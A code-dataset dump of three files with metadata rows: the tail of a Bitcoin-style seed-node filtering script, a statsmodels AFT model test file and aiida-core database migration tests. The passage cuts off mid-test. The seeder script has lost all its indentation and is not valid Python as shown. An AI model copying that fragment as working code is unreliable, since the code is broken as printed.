PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/MTNCCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
    if int(sline[1]) == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
    # Skip entries with an invalid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
    # Filter out hosts with multiple bitcoin ports; these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
| true
| true
|
1c447808e077aaa4205e3b4d55649bde5820daca
| 1,533
|
py
|
Python
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 76
|
2019-12-28T08:37:10.000Z
|
2022-03-29T02:19:41.000Z
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 7
|
2020-12-04T04:10:42.000Z
|
2021-03-16T00:53:09.000Z
|
venv/Lib/site-packages/statsmodels/emplike/tests/test_aft.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 35
|
2020-02-04T14:46:25.000Z
|
2022-03-24T03:56:17.000Z
|
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import heart
from statsmodels.tools import add_constant
from statsmodels.emplike.aft_el import emplikeAFT
from .results.el_results import AFTRes
class GenRes(object):
@classmethod
def setup_class(cls):
data = heart.load(as_pandas=False)
endog = np.log10(data.endog)
exog = add_constant(data.exog)
cls.mod1 = emplikeAFT(endog, exog, data.censors)
cls.res1 = cls.mod1.fit()
cls.res2 = AFTRes()
class Test_AFTModel(GenRes):
def test_params(self):
assert_almost_equal(self.res1.params(), self.res2.test_params,
decimal=4)
def test_beta0(self):
assert_almost_equal(self.res1.test_beta([4], [0]),
self.res2.test_beta0, decimal=4)
def test_beta1(self):
assert_almost_equal(self.res1.test_beta([-.04], [1]),
self.res2.test_beta1, decimal=4)
def test_beta_vect(self):
assert_almost_equal(self.res1.test_beta([3.5, -.035], [0, 1]),
self.res2.test_joint, decimal=4)
@pytest.mark.slow
def test_betaci(self):
ci = self.res1.ci_beta(1, -.06, 0)
ll = ci[0]
ul = ci[1]
ll_pval = self.res1.test_beta([ll], [1])[1]
ul_pval = self.res1.test_beta([ul], [1])[1]
assert_almost_equal(ul_pval, .050000, decimal=4)
assert_almost_equal(ll_pval, .05000, decimal=4)
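# --- Editor's sketch (addition, not part of the test module): fitting the
# AFT model directly, mirroring setup_class() above.
if __name__ == "__main__":
    data = heart.load(as_pandas=False)
    mod = emplikeAFT(np.log10(data.endog), add_constant(data.exog), data.censors)
    res = mod.fit()
    print("fitted parameters:", res.params())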
| 31.285714
| 70
| 0.622309
|
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import heart
from statsmodels.tools import add_constant
from statsmodels.emplike.aft_el import emplikeAFT
from .results.el_results import AFTRes
class GenRes(object):
@classmethod
def setup_class(cls):
data = heart.load(as_pandas=False)
endog = np.log10(data.endog)
exog = add_constant(data.exog)
cls.mod1 = emplikeAFT(endog, exog, data.censors)
cls.res1 = cls.mod1.fit()
cls.res2 = AFTRes()
class Test_AFTModel(GenRes):
def test_params(self):
assert_almost_equal(self.res1.params(), self.res2.test_params,
decimal=4)
def test_beta0(self):
assert_almost_equal(self.res1.test_beta([4], [0]),
self.res2.test_beta0, decimal=4)
def test_beta1(self):
assert_almost_equal(self.res1.test_beta([-.04], [1]),
self.res2.test_beta1, decimal=4)
def test_beta_vect(self):
assert_almost_equal(self.res1.test_beta([3.5, -.035], [0, 1]),
self.res2.test_joint, decimal=4)
@pytest.mark.slow
def test_betaci(self):
ci = self.res1.ci_beta(1, -.06, 0)
ll = ci[0]
ul = ci[1]
ll_pval = self.res1.test_beta([ll], [1])[1]
ul_pval = self.res1.test_beta([ul], [1])[1]
assert_almost_equal(ul_pval, .050000, decimal=4)
assert_almost_equal(ll_pval, .05000, decimal=4)
| true
| true
|
1c44780d3720b0a7ebaf9faf8a7f24a94a06d947
| 37,598
|
py
|
Python
|
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-07-14T07:59:44.000Z
|
2021-08-01T10:31:09.000Z
|
tests/backends/aiida_django/migrations/test_migrations_many.py
|
louisponet/aiida-core
|
3214236df66a3792ee57fe38a06c0c3bb65861ab
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name, import-error, no-name-in-module
"""
This file contains the majority of the migration tests that are too short to
go to a separate file.
"""
import numpy
from aiida.backends.testbase import AiidaTestCase
from aiida.backends.djsite.db.migrations import ModelModifierV0025
from aiida.backends.general.migrations import utils
from aiida.common.exceptions import IntegrityError
from .test_migrations_common import TestMigrations
class TestMigrationsModelModifierV0025(TestMigrations):
"""Sub class of `TestMigrations` that need to work on node attributes using the `ModelModifierV0025`."""
def set_attribute(self, node, key, value):
DbAttribute = self.apps.get_model('db', 'DbAttribute')
modifier = ModelModifierV0025(self.apps, DbAttribute)
modifier.set_value_for_node(node.pk, key, value)
def get_attribute(self, node, key, default=None): # pylint: disable=missing-docstring
DbAttribute = self.apps.get_model('db', 'DbAttribute')
modifier = ModelModifierV0025(self.apps, DbAttribute)
try:
return modifier.get_value_for_node(node.pk, key)
except AttributeError:
return default
@staticmethod
def get_node_array(node, name):
return utils.load_numpy_array_from_repository(node.uuid, name)
def set_node_array(self, node, name, array):
"""Store a new numpy array inside a node. Possibly overwrite the array if it already existed.
Internally, it stores a name.npy file in numpy format.
        :param node: The node in which to store the array.
        :param name: The name of the array.
:param array: The numpy array to store.
"""
utils.store_numpy_array_in_repository(node.uuid, name, array)
self.set_attribute(node, f'array|{name}', list(array.shape))
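# --- Editor's sketch (addition, not part of the test module): the storage
# convention set_node_array() relies on, written as a standalone helper.
# The uuid argument is hypothetical.
def _store_named_array(uuid, name, array):
    """Store <name>.npy in the repository and return the mirroring shape attribute."""
    utils.store_numpy_array_in_repository(uuid, name, array)
    return f'array|{name}', list(array.shape)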
class TestNoMigrations(AiidaTestCase):
"""Verify that no django migrations remain."""
def test_no_remaining_migrations(self): # pylint: disable=no-self-use
"""
Verify that no django migrations remain.
Equivalent to python manage.py makemigrations --check
"""
from django.core.management import call_command
# Raises SystemExit, if migrations remain
call_command('makemigrations', '--check', verbosity=0)
class TestDuplicateNodeUuidMigration(TestMigrations):
"""Test the migration that verifies that there are no duplicate UUIDs"""
migrate_from = '0013_django_1_8'
migrate_to = '0014_add_node_uuid_unique_constraint'
def setUpBeforeMigration(self):
from aiida.common.utils import get_new_uuid
from aiida.backends.general.migrations.utils import deduplicate_uuids, verify_uuid_uniqueness
self.file_name = 'test.temp'
self.file_content = '#!/bin/bash\n\necho test run\n'
self.nodes_boolean = []
self.nodes_integer = []
self.n_bool_duplicates = 2
self.n_int_duplicates = 4
node_bool = self.DbNode(type='data.bool.Bool.', user_id=self.default_user.id, uuid=get_new_uuid())
node_bool.save()
node_int = self.DbNode(type='data.int.Int.', user_id=self.default_user.id, uuid=get_new_uuid())
node_int.save()
self.nodes_boolean.append(node_bool)
self.nodes_integer.append(node_int)
for _ in range(self.n_bool_duplicates):
node = self.DbNode(type='data.bool.Bool.', user_id=self.default_user.id, uuid=node_bool.uuid)
node.save()
utils.put_object_from_string(node.uuid, self.file_name, self.file_content)
self.nodes_boolean.append(node)
for _ in range(self.n_int_duplicates):
node = self.DbNode(type='data.int.Int.', user_id=self.default_user.id, uuid=node_int.uuid)
node.save()
utils.put_object_from_string(node.uuid, self.file_name, self.file_content)
self.nodes_integer.append(node)
# Verify that there are duplicate UUIDs by checking that the following function raises
with self.assertRaises(IntegrityError):
verify_uuid_uniqueness(table='db_dbnode')
# Now run the function responsible for solving duplicate UUIDs which would also be called by the user
# through the `verdi database integrity detect-duplicate-uuid` command
deduplicate_uuids(table='db_dbnode')
def test_deduplicated_uuids(self):
"""Verify that after the migration, all expected nodes are still there with unique UUIDs."""
# If the duplicate UUIDs were successfully fixed, the following should not raise.
from aiida.backends.general.migrations.utils import verify_uuid_uniqueness
verify_uuid_uniqueness(table='db_dbnode')
# Reload the nodes by PK and check that all UUIDs are now unique
nodes_boolean = [self.load_node(node.pk) for node in self.nodes_boolean]
uuids_boolean = [node.uuid for node in nodes_boolean]
self.assertEqual(len(set(uuids_boolean)), len(nodes_boolean))
nodes_integer = [self.load_node(node.pk) for node in self.nodes_integer]
uuids_integer = [node.uuid for node in nodes_integer]
self.assertEqual(len(set(uuids_integer)), len(nodes_integer))
for node in nodes_boolean:
self.assertEqual(utils.get_object_from_repository(node.uuid, self.file_name), self.file_content)
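# --- Editor's sketch (addition, not part of the test module): the
# detect-then-repair pattern exercised in setUpBeforeMigration(), written as
# a standalone helper using the same imports.
def _ensure_unique_node_uuids():
    from aiida.backends.general.migrations.utils import (
        deduplicate_uuids, verify_uuid_uniqueness)
    try:
        verify_uuid_uniqueness(table='db_dbnode')
    except IntegrityError:
        # Duplicates detected: rewrite the clashing UUIDs, then re-verify.
        deduplicate_uuids(table='db_dbnode')
        verify_uuid_uniqueness(table='db_dbnode')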
class TestUuidMigration(TestMigrations):
"""
This test class checks the migration 0018_django_1_11 which switches from the django_extensions
UUID field to the native UUIDField of django 1.11. It also introduces unique constraints
on all uuid columns (previously existed only on dbnode).
"""
migrate_from = '0017_drop_dbcalcstate'
migrate_to = '0018_django_1_11'
def setUpBeforeMigration(self):
node = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
node.save()
self.node_uuid = str(node.uuid)
self.node_id = node.id
def test_uuid_untouched(self):
"""Verify that Node uuids remain unchanged."""
node = self.load_node(self.node_id)
self.assertEqual(self.node_uuid, str(node.uuid))
class TestGroupRenamingMigration(TestMigrations):
"""
This test class checks the migration 0022_dbgroup_type_string_change_content which updates the
type_string column of the groups.
"""
migrate_from = '0021_dbgroup_name_to_label_type_to_type_string'
migrate_to = '0022_dbgroup_type_string_change_content'
def setUpBeforeMigration(self):
# Create group
DbGroup = self.apps.get_model('db', 'DbGroup')
# test user group type_string: '' -> 'user'
group_user = DbGroup(label='test_user_group', user_id=self.default_user.id, type_string='')
group_user.save()
self.group_user_pk = group_user.pk
# test data.upf group type_string: 'data.upf.family' -> 'data.upf'
group_data_upf = DbGroup(
label='test_data_upf_group', user_id=self.default_user.id, type_string='data.upf.family'
)
group_data_upf.save()
self.group_data_upf_pk = group_data_upf.pk
# test auto.import group type_string: 'aiida.import' -> 'auto.import'
group_autoimport = DbGroup(label='test_import_group', user_id=self.default_user.id, type_string='aiida.import')
group_autoimport.save()
self.group_autoimport_pk = group_autoimport.pk
# test auto.run group type_string: 'autogroup.run' -> 'auto.run'
group_autorun = DbGroup(label='test_autorun_group', user_id=self.default_user.id, type_string='autogroup.run')
group_autorun.save()
self.group_autorun_pk = group_autorun.pk
def test_group_string_update(self):
""" Test that the type_string were updated correctly """
DbGroup = self.apps.get_model('db', 'DbGroup')
# test user group type_string: '' -> 'user'
group_user = DbGroup.objects.get(pk=self.group_user_pk)
self.assertEqual(group_user.type_string, 'user')
# test data.upf group type_string: 'data.upf.family' -> 'data.upf'
group_data_upf = DbGroup.objects.get(pk=self.group_data_upf_pk)
self.assertEqual(group_data_upf.type_string, 'data.upf')
# test auto.import group type_string: 'aiida.import' -> 'auto.import'
group_autoimport = DbGroup.objects.get(pk=self.group_autoimport_pk)
self.assertEqual(group_autoimport.type_string, 'auto.import')
# test auto.run group type_string: 'autogroup.run' -> 'auto.run'
group_autorun = DbGroup.objects.get(pk=self.group_autorun_pk)
self.assertEqual(group_autorun.type_string, 'auto.run')
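# --- Editor's sketch (addition, not used by the tests): the type_string
# renames that migration 0022 applies, summarized as a lookup table.
GROUP_TYPE_STRING_RENAMES = {
    '': 'user',
    'data.upf.family': 'data.upf',
    'aiida.import': 'auto.import',
    'autogroup.run': 'auto.run',
}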
class TestCalcAttributeKeysMigration(TestMigrationsModelModifierV0025):
"""
This test class checks that the migration 0023_calc_job_option_attribute_keys works as expected
which migrates CalcJobNode attributes for metadata options whose key changed.
"""
migrate_from = '0022_dbgroup_type_string_change_content'
migrate_to = '0023_calc_job_option_attribute_keys'
KEY_RESOURCES_OLD = 'jobresource_params'
KEY_RESOURCES_NEW = 'resources'
KEY_PARSER_NAME_OLD = 'parser'
KEY_PARSER_NAME_NEW = 'parser_name'
KEY_PROCESS_LABEL_OLD = '_process_label'
KEY_PROCESS_LABEL_NEW = 'process_label'
KEY_ENVIRONMENT_VARIABLES_OLD = 'custom_environment_variables'
KEY_ENVIRONMENT_VARIABLES_NEW = 'environment_variables'
def setUpBeforeMigration(self):
self.process_label = 'TestLabel'
self.resources = {'number_machines': 1}
self.environment_variables = {}
self.parser_name = 'aiida.parsers:parser'
self.node_work = self.DbNode(type='node.process.workflow.WorkflowNode.', user_id=self.default_user.id)
self.node_work.save()
self.set_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_calc.save()
self.set_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_calc, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, self.parser_name)
# Create a node of a different type to ensure that its attributes are not updated
self.node_other = self.DbNode(type='node.othernode.', user_id=self.default_user.id)
self.node_other.save()
self.set_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_other, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_other, self.KEY_PARSER_NAME_OLD, self.parser_name)
def test_attribute_key_changes(self):
"""Verify that the keys are successfully changed of the affected attributes."""
NOT_FOUND = tuple([0])
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_NEW), self.resources)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_NEW), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_NEW), self.parser_name)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, default=NOT_FOUND), NOT_FOUND)
# The following node should not be migrated even if its attributes have the matching keys because
# the node is not a ProcessNode
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD), self.process_label)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_OLD), self.resources)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_OLD), self.parser_name)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_NEW, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_NEW, default=NOT_FOUND), NOT_FOUND)
class TestDbLogMigrationRecordCleaning(TestMigrations):
"""
This test class checks that the migration 0024_dblog_update works as expected.
That migration updates of the DbLog table and adds uuids
"""
migrate_from = '0023_calc_job_option_attribute_keys'
migrate_to = '0024_dblog_update'
def setUpBeforeMigration(self): # pylint: disable=too-many-locals
import json
import importlib
from aiida.backends.general.migrations.utils import dumps_json
update_024 = importlib.import_module('aiida.backends.djsite.db.migrations.0024_dblog_update')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
param = DbNode(type='data.dict.Dict.', user_id=self.default_user.id)
leg_workf = DbWorkflow(label='Legacy WorkflowNode', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
# Storing them
calc_1.save()
param.save()
leg_workf.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
objpk=calc_1.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_1.pk,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_2 = DbLog(
loggername='something.else logger',
objpk=param.pk,
objname='something.else.',
message='parameter data with log message'
)
log_3 = DbLog(
loggername='TopologicalWorkflow logger',
objpk=leg_workf.pk,
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow',
message='parameter data with log message'
)
log_4 = DbLog(
loggername='CalculationNode logger',
objpk=calc_2.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_2.pk,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Creating two more log records that don't correspond to a node
log_5 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1000),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1000',
metadata=json.dumps({
'msecs': 718,
'objpk': (calc_2.pk + 1000),
'lineno': 361,
'levelno': 25,
'message': 'calculation node 1000',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_6 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1001),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 10001',
metadata=json.dumps({
'msecs': 722,
'objpk': (calc_2.pk + 1001),
'lineno': 362,
'levelno': 24,
'message': 'calculation node 1001',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Storing the log records
log_1.save()
log_2.save()
log_3.save()
log_4.save()
log_5.save()
log_6.save()
# Storing temporarily information needed for the check at the test
self.to_check = dict()
# Keeping calculation & calculation log ids
self.to_check['CalculationNode'] = (
calc_1.pk,
log_1.pk,
calc_2.pk,
log_4.pk,
)
# Getting the serialized Dict logs
param_data = DbLog.objects.filter(objpk=param.pk).filter(objname='something.else.'
).values(*update_024.values_to_export)[:1]
serialized_param_data = dumps_json(list(param_data))
        # Getting the serialized logs for the unknown entities (as the export migration function
        # provides them) - this should coincide with the above
serialized_unknown_exp_logs = update_024.get_serialized_unknown_entity_logs(self.schema_editor)
# Getting their number
unknown_exp_logs_number = update_024.get_unknown_entity_log_number(self.schema_editor)
self.to_check['Dict'] = (serialized_param_data, serialized_unknown_exp_logs, unknown_exp_logs_number)
# Getting the serialized legacy workflow logs
leg_wf = DbLog.objects.filter(objpk=leg_workf.pk).filter(
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow'
).values(*update_024.values_to_export)[:1]
serialized_leg_wf_logs = dumps_json(list(leg_wf))
# Getting the serialized logs for the legacy workflow logs (as the export migration function
        # provides them) - this should coincide with the above
serialized_leg_wf_exp_logs = update_024.get_serialized_legacy_workflow_logs(self.schema_editor)
        leg_wf_exp_logs_number = update_024.get_legacy_workflow_log_number(self.schema_editor)
        self.to_check['WorkflowNode'] = (serialized_leg_wf_logs, serialized_leg_wf_exp_logs, leg_wf_exp_logs_number)
# Getting the serialized logs that don't correspond to a DbNode record
logs_no_node = DbLog.objects.filter(id__in=[log_5.id, log_6.id]).values(*update_024.values_to_export)
serialized_logs_no_node = dumps_json(list(logs_no_node))
# Getting the serialized logs that don't correspond to a node (as the export migration function
        # provides them) - this should coincide with the above
serialized_logs_exp_no_node = update_024.get_serialized_logs_with_no_nodes(self.schema_editor)
logs_no_node_number = update_024.get_logs_with_no_nodes_number(self.schema_editor)
self.to_check['NoNode'] = (serialized_logs_no_node, serialized_logs_exp_no_node, logs_no_node_number)
def tearDown(self):
"""Cleaning the DbLog, DbUser, DbWorkflow and DbNode records"""
DbUser = self.apps.get_model('db', 'DbUser')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
DbLog.objects.all().delete()
DbNode.objects.all().delete() # pylint: disable=no-member
DbWorkflow.objects.all().delete() # pylint: disable=no-member
DbUser.objects.all().delete() # pylint: disable=no-member
super().tearDown()
def test_dblog_calculation_node(self):
"""
        Verify that after the migration only two log records are left and that they correspond to
the CalculationNodes.
"""
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist
self.assertEqual(DbLog.objects.count(), 2, 'There should be two log records left')
# Get the node id of the log record referencing the node and verify that it is the correct one
dbnode_id_1 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][1]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_1, self.to_check['CalculationNode'][0], 'referenced node is not the expected one')
dbnode_id_2 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][3]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_2, self.to_check['CalculationNode'][2], 'referenced node is not the expected one')
def test_dblog_correct_export_of_logs(self):
"""
Verify that export log methods for legacy workflows, unknown entities and log records that
        don't correspond to nodes work as expected
"""
import json
self.assertEqual(self.to_check['Dict'][0], self.to_check['Dict'][1])
self.assertEqual(self.to_check['Dict'][2], 1)
self.assertEqual(self.to_check['WorkflowNode'][0], self.to_check['WorkflowNode'][1])
self.assertEqual(self.to_check['WorkflowNode'][2], 1)
self.assertEqual(
sorted(list(json.loads(self.to_check['NoNode'][0])), key=lambda k: k['id']),
sorted(list(json.loads(self.to_check['NoNode'][1])), key=lambda k: k['id'])
)
self.assertEqual(self.to_check['NoNode'][2], 2)
def test_dblog_unique_uuids(self):
"""
Verify that the UUIDs of the log records are unique
"""
DbLog = self.apps.get_model('db', 'DbLog')
l_uuids = list(_['uuid'] for _ in DbLog.objects.values('uuid'))
s_uuids = set(l_uuids)
self.assertEqual(len(l_uuids), len(s_uuids), 'The UUIDs are not all unique.')
def test_metadata_correctness(self):
"""
        Verify that the metadata of the remaining records no longer contains objpk and objname values.
"""
import json
DbLog = self.apps.get_model('db', 'DbLog')
metadata = list(json.loads(_['metadata']) for _ in DbLog.objects.values('metadata'))
# Verify that the objpk and objname are no longer part of the metadata
for m_res in metadata:
self.assertNotIn('objpk', m_res.keys(), 'objpk should not exist any more in metadata')
self.assertNotIn('objname', m_res.keys(), 'objname should not exist any more in metadata')
class TestDbLogMigrationBackward(TestMigrations):
"""
Check that backward migrations work also for the DbLog migration(s).
"""
migrate_from = '0024_dblog_update'
migrate_to = '0023_calc_job_option_attribute_keys'
def setUpBeforeMigration(self):
import json
DbNode = self.apps.get_model('db', 'DbNode')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.1', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.2', user_id=self.default_user.id)
# Storing them
calc_1.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_1.pk,
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
})
)
log_2 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_2.pk,
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
})
)
# Storing the log records
log_1.save()
log_2.save()
# Keeping what is needed to be verified at the test
self.to_check = dict()
self.to_check[log_1.pk] = (log_1.dbnode_id, calc_1.type)
self.to_check[log_2.pk] = (log_2.dbnode_id, calc_2.type)
def test_objpk_objname(self):
"""
This test verifies that the objpk and objname have the right values
after a forward and a backward migration.
"""
import json
DbLog = self.apps.get_model('db', 'DbLog')
        # Check that only two log records exist with the correct objpk and objname
for log_pk, to_check_value in self.to_check.items():
log_entry = DbLog.objects.filter(pk=log_pk)[:1].get()
log_dbnode_id, node_type = to_check_value
self.assertEqual(
log_dbnode_id, log_entry.objpk,
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
